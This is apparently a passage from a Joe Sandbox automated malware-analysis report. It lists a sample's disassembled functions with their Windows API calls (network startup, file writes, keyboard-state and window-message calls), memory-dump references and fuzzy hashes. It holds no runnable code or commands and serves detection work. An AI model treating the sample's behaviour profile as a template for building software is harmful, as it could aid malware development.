                                                                                                                                        • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                                        • Instruction ID: 0e8b81c8ed5459f682d18b7a5ee518e85dbc5743d1fde638bcda321267330233
                                                                                                                                        • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                                                                                                                                        • Instruction Fuzzy Hash: F2017CB9601502AFD305AB28C985D39F7AAFF853507148159E92AC7702CB34AC22CBE0
                                                                                                                                        Function 0076CAEE Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                                        • Instruction ID: e2b09154fe83c5b4d6fd88deccf484f9aebc372f361a4f345b98a0c32a42726e
                                                                                                                                        • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                                        • Instruction Fuzzy Hash: 7F01D6B2210701AED7159F38C80BE66BB98DF447A0F50C53AF99ECB1D1EB79E4008B90
                                                                                                                                        Function 0077F2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                                        • Instruction ID: 8412f000d0e73c2703242f19ab98fb1b8eb4935ef92fd2f6c01cbad43a881fa4
                                                                                                                                        • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                                        • Instruction Fuzzy Hash: F2012B30004A01EBCF206F2CD80895A7BA8AF813A0B10C93EF85D43251DB39980187A1
                                                                                                                                        Function 007B95AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 007B95C9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Startup
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 724789610-0
                                                                                                                                        • Opcode ID: 77e81bad0cdbceedca048af262deab5b5e0fe0d628bb05fe308c39d72723d24c
                                                                                                                                        • Instruction ID: 751e3a4ea045c5e5d4241e481112c325fe23d795eb2fc321e4b713c341c7b36d
                                                                                                                                        • Opcode Fuzzy Hash: 77e81bad0cdbceedca048af262deab5b5e0fe0d628bb05fe308c39d72723d24c
                                                                                                                                        • Instruction Fuzzy Hash: FFE0E533204214AFC320EA64DC45AABB799BF89730F04876AFDA48B2C1DA30DC14C3D1
                                                                                                                                        Function 00763E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,007634E2,?,00000001), ref: 00763E6D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                        • Opcode ID: 0c10840e715646930233832505c0e7cd7492556a0560b029e088d89466dd6245
                                                                                                                                        • Instruction ID: 5d6e3bfc72b94f291182d7940d41dc36cda6d90aa5a8aba21bbf570629a7c107
                                                                                                                                        • Opcode Fuzzy Hash: 0c10840e715646930233832505c0e7cd7492556a0560b029e088d89466dd6245
                                                                                                                                        • Instruction Fuzzy Hash: 89F039B5105752CFCB349F64D494812BBE0BF047253248A3FE9D786621C73B9948DF20
                                                                                                                                        Function 007A79F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 007A7A11
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FolderPath_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3334745507-0
                                                                                                                                        • Opcode ID: dc8b9afa27a6fcff6db8f5bb8a82724aed447808d66b167be1951910f9849695
                                                                                                                                        • Instruction ID: 6f9e4b71b65a88e5534ee33bb523ffbc39b99cafd03409f4a52033c797ac2925
                                                                                                                                        • Opcode Fuzzy Hash: dc8b9afa27a6fcff6db8f5bb8a82724aed447808d66b167be1951910f9849695
                                                                                                                                        • Instruction Fuzzy Hash: 4CD05EA650022C6FEB64E6349C4DDFB36ADC744148F0042A07C6DD2042E924AE4586E0
                                                                                                                                        Function 007A6852 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007A6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,007A685E,?,?,?,007D4A5C,007FE448,00000003,?,?), ref: 007A66E2
                                                                                                                                        • WriteFile.KERNEL32(?,?,008222E8,00000000,00000000,?,?,?,007D4A5C,007FE448,00000003,?,?,00764C44,?,?), ref: 007A686C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$PointerWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 539440098-0
                                                                                                                                        • Opcode ID: a54d2180bc1d35f780b22950e61302ee943216094a42c96d66eb183229a0a569
                                                                                                                                        • Instruction ID: a4307f033e6eb872cfd95e2bcb69e55b7722f78b96c7e65d49c5e6e81952d9a3
                                                                                                                                        • Opcode Fuzzy Hash: a54d2180bc1d35f780b22950e61302ee943216094a42c96d66eb183229a0a569
                                                                                                                                        • Instruction Fuzzy Hash: 3EE0B636400218FBDB20AF94D805A8ABBB9EB09354F10451AF94195151D7B5AE149BA5
                                                                                                                                        Function 0076193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00761952
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendTimeout
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1599653421-0
                                                                                                                                        • Opcode ID: 8fd57013c9f08c844d514e23af7caca8f6f0ab44c5e094233ccfada410d56593
                                                                                                                                        • Instruction ID: d9cd6f890d685c151785f7473f6a2cf1d5ae678e504cad611818574ab8ba7b77
                                                                                                                                        • Opcode Fuzzy Hash: 8fd57013c9f08c844d514e23af7caca8f6f0ab44c5e094233ccfada410d56593
                                                                                                                                        • Instruction Fuzzy Hash: 12D012F16902087EFB008761CD07DBB775CD721F81F0086617E06DA4D1D6649E098574
                                                                                                                                        Function 0079E390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00761952
                                                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0079E3AA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1777923405-0
                                                                                                                                        • Opcode ID: a4f08c635e7f89757a4576bf7586127b81921482e0a871174778d9f9758f49f9
                                                                                                                                        • Instruction ID: 778114e3197cdda4fdc0534d3bbb12d5074091ad130d5db545f3d41faaaf796b
                                                                                                                                        • Opcode Fuzzy Hash: a4f08c635e7f89757a4576bf7586127b81921482e0a871174778d9f9758f49f9
                                                                                                                                        • Instruction Fuzzy Hash: 80D01231144250EAFE706B15FD0AFC177A29B44750F154459B5816B0E5C6D65C415544
                                                                                                                                        Function 007B6FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: TextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 530164218-0
                                                                                                                                        • Opcode ID: fc75d8700db7c386a9536a291e6ba1cc09f9f064de034e54efdfee76073c1f90
                                                                                                                                        • Instruction ID: 4146c09e9bc4248d1e3fcad38668ee3d71ef2c11174f1d63e6643dac5ca576da
                                                                                                                                        • Opcode Fuzzy Hash: fc75d8700db7c386a9536a291e6ba1cc09f9f064de034e54efdfee76073c1f90
                                                                                                                                        • Instruction Fuzzy Hash: C9D052362106149F8B10EF98EC48C8ABBE9FF4C310300C062FA0ACF230CA21FC509B84
                                                                                                                                        Function 00764FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,007D49DA,?,?,00000000), ref: 00764FC4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FilePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                        • Opcode ID: cfb59138276cafc61681654652816f778093a4e295554bab885c7460040efe04
                                                                                                                                        • Instruction ID: 6f47d5ac8cec26bd128e259a497e267e785bb23351f41169b9aa4520e266aa92
                                                                                                                                        • Opcode Fuzzy Hash: cfb59138276cafc61681654652816f778093a4e295554bab885c7460040efe04
                                                                                                                                        • Instruction Fuzzy Hash: 6CD0C97464020CBFEB14CB90DC86F9A7BBCEB04718F200194F600AA2D0D2F2BE408B55
                                                                                                                                        Function 007D4DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClearVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                        • Opcode ID: 44b58ae9447970779785cb99d315d06f996773b40bb9b52303fd8d477986000d
                                                                                                                                        • Instruction ID: ec14c18325f1fcf272c07fa39bd29ef4490b622a83c9f77b0ed1fd980c684e02
                                                                                                                                        • Opcode Fuzzy Hash: 44b58ae9447970779785cb99d315d06f996773b40bb9b52303fd8d477986000d
                                                                                                                                        • Instruction Fuzzy Hash: 92D0A9B0400240CBEB306F28E80C74AB7E4BF01340F20C829E8CA86150D37EACC2AB01
                                                                                                                                        Function 00784129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wfsopen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 197181222-0
                                                                                                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                        • Instruction ID: c954ff5a33a672b6180b42ea52b4051f8ebacc61e217a147ec6234f8bff948f5
                                                                                                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                                        • Instruction Fuzzy Hash: 44B0927288030CB7CE012A82EC06A493B199B50660F008020FB0C18161A6BBAAA09A89
                                                                                                                                        Function 007650EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,007D5950), ref: 0076510C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                        • Opcode ID: 839a6363941b0419c1e8681e69a989ce70cd76f7306e9638b1aa5573b981822a
                                                                                                                                        • Instruction ID: ece65b1e79cfb35e1721753f0cf00ab9ac25b8b305ae904a713956a38dcc6ec5
                                                                                                                                        • Opcode Fuzzy Hash: 839a6363941b0419c1e8681e69a989ce70cd76f7306e9638b1aa5573b981822a
                                                                                                                                        • Instruction Fuzzy Hash: 5AE0B675400B02CBC2354F1AE844452FBF5FFE13613258A2FD9E682660DBB45886EB90

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 007CF5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 007CF64E
                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007CF6AD
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007CF6EA
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007CF711
                                                                                                                                        • SendMessageW.USER32 ref: 007CF737
                                                                                                                                        • _wcsncpy.LIBCMT ref: 007CF7A3
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 007CF7C4
                                                                                                                                        • GetKeyState.USER32(00000009), ref: 007CF7D1
                                                                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007CF7E7
                                                                                                                                        • GetKeyState.USER32(00000010), ref: 007CF7F1
                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007CF820
                                                                                                                                        • SendMessageW.USER32 ref: 007CF843
                                                                                                                                        • SendMessageW.USER32(?,00001030,?,007CDE69), ref: 007CF940
                                                                                                                                        • SetCapture.USER32(?), ref: 007CF970
                                                                                                                                        • ClientToScreen.USER32(?,?), ref: 007CF9D4
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 007CF9FA
                                                                                                                                        • ReleaseCapture.USER32 ref: 007CFA05
                                                                                                                                        • GetCursorPos.USER32(?), ref: 007CFA3A
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 007CFA47
                                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 007CFAA9
                                                                                                                                        • SendMessageW.USER32 ref: 007CFAD3
                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 007CFB12
                                                                                                                                        • SendMessageW.USER32 ref: 007CFB3D
                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007CFB55
                                                                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007CFB60
                                                                                                                                        • GetCursorPos.USER32(?), ref: 007CFB81
                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 007CFB8E
